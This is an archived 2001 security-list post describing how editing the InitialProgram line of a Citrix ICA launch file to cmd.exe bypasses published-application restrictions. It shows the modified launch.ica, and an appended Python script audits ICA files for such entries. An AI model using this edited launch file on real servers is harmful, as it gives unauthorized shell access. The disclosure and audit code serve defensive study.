Citrix Client Access Verification

From: sween (sweenat_private)
Date: Sun Sep 23 2001 - 06:38:49 PDT


    Your professional opinions are appreciated.
    
    About a month ago I had posted the below as a Citrix Client Access
    Advisory and got several responses to the effect that it was either not a
    valid vulnerability or that it was a default configuration problem.  
    
    which may be true.
    
    but consider this.  The "only allow users to launch published
    applications" checkbox only works in an environment when you are only
    serving published applications and not in an environment where you are
    serving desktops AND applications.  You can visually tell by the
    launch.ica if an nfuse menu is either serving an app or a desktop (yes?).
    
    meaning:
    a quick binary click session through hyperlinks would reveal whether or
    not you could use this:
    
    
    
    ####HERE IS THE POST FROM A MONTH AGO#####
    
    Any help here proving this valid/invalid would be hot.  I have
    considerable interest, but limited resources.
    Thanks!
    
    Platform:
    Windows Terminal Server NT 4.0
    
    Synopsis:
    Using an IE Web Client and a Linux Citrix ICA client I was able
    to gain access to executables and files on a restricted drive (c:\).
    
    Description:
    Originally I was changing the application name in an attempt to
    gain access to apps, but when I changed it to #gar I got an error message
    conveying "The system cannot find the file specified."... which is always
    an invitation to play.
    
    Below is the listed launch.ica file that I used to
    connect.  The only parameter that was changed was the 'InitialProgram=' parameter. 
    I simply removed the '#' symbol and replaced it with a valid
    application and its path (c:\wtsrv\system32\cmd.exe).  I was able to
    launch cmd.exe, telnet.exe (with arguments), the citrix toolbar, etc. but
    had no escalation in privileges.
    
    The Citrix ICA Client for Linux was easy enough, since it allows you to
    create the launch file on the fly...
    
    screenshots:
    
    Initial error with #gar as an application:
                    http://www.modelm.org/proof.jpg
    
    Here is a shot of the edited launch.ica file after execution:
                    http://www.modelm.org/proof1.jpg
    
    ------launch.ica---
    
    
    <!----<[NFuse_setSessionField NFuse_WindowType=closed]>---->
    
    [WFClient]
    Version=2
    ClientName=
    
    [ApplicationServers]=
    30 year old script kiddie=
    
    [30 year old script kiddie]
    Address=citrixpooter:1496
    
    #InitialProgram=v:\Documents and Settings\administrator\desktop\launch.ica
    
    InitialProgram=c:\wtsrv\system32\cmd.exe 
    
    DesiredColor=2
    TransportDriver=
    WinStationDriver=ICA 3.0
    
    Username=
    Domain=
    Password=
    
    Command=   <-- any input here would be fantastic
    
    ClientAudio=On
    
    ScreenPercent=80
    
    [EncRC5-0]
    DriverNameWin32=pdc0n.dll
    
    [EncRC5-40]
    DriverNameWin32=pdc40n.dll
    
    [EncRC5-56]
    DriverNameWin32=pdc56n.dll
    
    [EncRC5-128]
    DriverNameWin32=pdc128n.dll
    
    ------end launch.ica-----
    
    
    --
    
     ---  -sween                               
    | M | http://www.modelm.org                 
     ---  "force feedback computing since 1984."
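The post above turns on one field of the ICA file: whether InitialProgram names a published application (a value starting with '#', which the server resolves against its own list) or an arbitrary executable path that the server will run directly unless "only allow users to launch published applications" is enforced for that session type. The following script is an added example written for this archive page, not code from the original post or from Citrix: it parses an ICA launch file with a tolerant INI-style reader and classifies each server entry's InitialProgram so an administrator can audit ICA files served by their NFuse pages (or captured at a gateway) for entries that would be rejected by a properly restricted server. The sample ICA text, the host name citrix-host.example, the section names notepad-app and raw-shell, and the treatment of '#'- and ';'-prefixed lines as comments are all my assumptions, not part of the Citrix specification.

```python
"""Audit ICA launch files for InitialProgram values that are arbitrary
program paths rather than published-application references.

Added example for this archive page; not code from the original post or
from Citrix.  Format handling is deliberately tolerant (assumption: ICA
files are INI-like, NFuse template comments '<!---- ... ---->' and lines
starting with ';' or '#' are ignored, and a stray '=' after a section
header is accepted, as in the posted launch.ica).
"""
import re
from typing import Dict, List, Tuple

# [Section] optionally followed by a stray '=' (the posted file has one).
SECTION_RE = re.compile(r"^\[(?P<name>[^\]]+)\]\s*=?\s*$")
# key=value with surrounding whitespace trimmed.
KEYVAL_RE = re.compile(r"^(?P<key>[^=]+?)\s*=\s*(?P<value>.*?)\s*$")


def parse_ica(text: str) -> Dict[str, Dict[str, str]]:
    """Parse ICA text into {section: {key: value}} (insertion order kept)."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#", "<!--")):
            continue  # blank, comment, or NFuse template residue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name").strip()
            sections.setdefault(current, {})
            continue
        m = KEYVAL_RE.match(line)
        if m and current is not None:
            sections[current][m.group("key")] = m.group("value")
    return sections


def classify_initial_program(value: str) -> str:
    """'desktop' for an empty value, 'published' for '#name', else 'arbitrary'.

    'arbitrary' is the case from the post: a raw path the server is asked
    to execute, which the published-applications-only setting should block.
    """
    if value == "":
        return "desktop"
    if value.startswith("#"):
        return "published"
    return "arbitrary"


def audit_ica(text: str) -> List[Tuple[str, str, str]]:
    """Return (server_section, classification, InitialProgram) for each
    server listed under [ApplicationServers]."""
    sections = parse_ica(text)
    findings: List[Tuple[str, str, str]] = []
    for server in sections.get("ApplicationServers", {}):
        conf = sections.get(server, {})
        value = conf.get("InitialProgram", "")
        findings.append((server, classify_initial_program(value), value))
    return findings


# Constructed sample: one entry that references a published app and one
# that has been edited to a direct program path, mirroring the post.
SAMPLE_ICA = """\
<!----<[NFuse_setSessionField NFuse_WindowType=closed]>---->
[WFClient]
Version=2

[ApplicationServers]=
notepad-app=
raw-shell=

[notepad-app]
Address=citrix-host.example:1494
InitialProgram=#Notepad

[raw-shell]
Address=citrix-host.example:1494
#InitialProgram=#Notepad
InitialProgram=c:\\winnt\\system32\\cmd.exe
"""

if __name__ == "__main__":
    for server, kind, value in audit_ica(SAMPLE_ICA):
        flag = "  <-- review" if kind == "arbitrary" else ""
        print(f"{server:12s} {kind:10s} {value!r}{flag}")
```

Run against a directory of launch.ica files, anything classified as 'arbitrary' is an entry that only makes sense if the server really does accept client-supplied program paths; on a farm that serves both desktops and published applications, that is the configuration gap the post describes, and the fix belongs on the server side (restricting launches to published applications for every connection type), not in the client file.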
    



    This archive was generated by hypermail 2b30 : Sun Sep 23 2001 - 10:09:40 PDT